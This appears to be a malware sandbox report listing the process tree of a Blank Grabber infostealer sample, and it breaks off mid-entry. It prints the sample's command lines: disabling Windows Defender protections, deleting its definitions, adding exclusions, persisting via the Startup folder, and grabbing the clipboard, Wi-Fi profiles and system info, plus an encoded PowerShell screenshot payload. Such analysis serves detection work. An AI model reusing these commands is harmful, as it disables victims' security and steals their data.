                                                      Target ID:0
                                                      Start time:20:21:58
                                                      Start date:03/08/2024
                                                      Path:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
                                                      Imagebase:0x7ff73ae10000
                                                      File size:8'505'922 bytes
                                                      MD5 hash:D87B402B821FA842D89283AA8654D9C0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2041945157.000001CCD86C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2041945157.000001CCD86C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:20:22:00
                                                      Start date:03/08/2024
                                                      Path:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
                                                      Imagebase:0x7ff73ae10000
                                                      File size:8'505'922 bytes
                                                      MD5 hash:D87B402B821FA842D89283AA8654D9C0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2320597036.0000028C88DA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:20:22:02
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:20:22:02
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:20:22:02
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:20:22:02
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:20:22:02
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:20:22:02
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:20:22:02
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:20:22:02
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:20:22:02
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:20:22:03
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:20:22:03
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:20:22:03
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:20:22:03
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:16
                                                      Start time:20:22:03
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:17
                                                      Start time:20:22:03
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:18
                                                      Start time:20:22:03
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:20:22:03
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:20:22:03
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:21
                                                      Start time:20:22:03
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:20:22:04
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\tasklist.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:tasklist /FO LIST
                                                      Imagebase:0x7ff669c80000
                                                      File size:106'496 bytes
                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:23
                                                      Start time:20:22:04
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:powershell Get-Clipboard
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:24
                                                      Start time:20:22:04
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                      Imagebase:0x7ff6e8540000
                                                      File size:576'000 bytes
                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:25
                                                      Start time:20:22:04
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\tasklist.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:tasklist /FO LIST
                                                      Imagebase:0x7ff669c80000
                                                      File size:106'496 bytes
                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:26
                                                      Start time:20:22:04
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\tasklist.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:tasklist /FO LIST
                                                      Imagebase:0x7ff669c80000
                                                      File size:106'496 bytes
                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:27
                                                      Start time:20:22:05
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:28
                                                      Start time:20:22:05
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:29
                                                      Start time:20:22:05
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:30
                                                      Start time:20:22:05
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:31
                                                      Start time:20:22:05
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:32
                                                      Start time:20:22:06
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\tree.com
                                                      Wow64 process (32bit):false
                                                      Commandline:tree /A /F
                                                      Imagebase:0x7ff6af5c0000
                                                      File size:20'992 bytes
                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:33
                                                      Start time:20:22:06
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\netsh.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:netsh wlan show profile
                                                      Imagebase:0x7ff7269b0000
                                                      File size:96'768 bytes
                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:34
                                                      Start time:20:22:07
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:35
                                                      Start time:20:22:07
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:36
                                                      Start time:20:22:07
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                      Imagebase:0x7ff6a7b40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:37
                                                      Start time:20:22:07
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:38
                                                      Start time:20:22:07
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:39
                                                      Start time:20:22:07
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\systeminfo.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:systeminfo
                                                      Imagebase:0x7ff7a3e00000
                                                      File size:110'080 bytes
                                                      MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:40
                                                      Start time:20:22:07
                                                      Start date:03/08/2024
                                                      Path:C:\Windows\System32\tree.com
                                                      Wow64 process (32bit):false
                                                      Commandline:tree /A /F
                                                      Imagebase:0x7ff6af5c0000
                                                      File size:20'992 bytes
                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:41
                                                      Start time:20:22:07
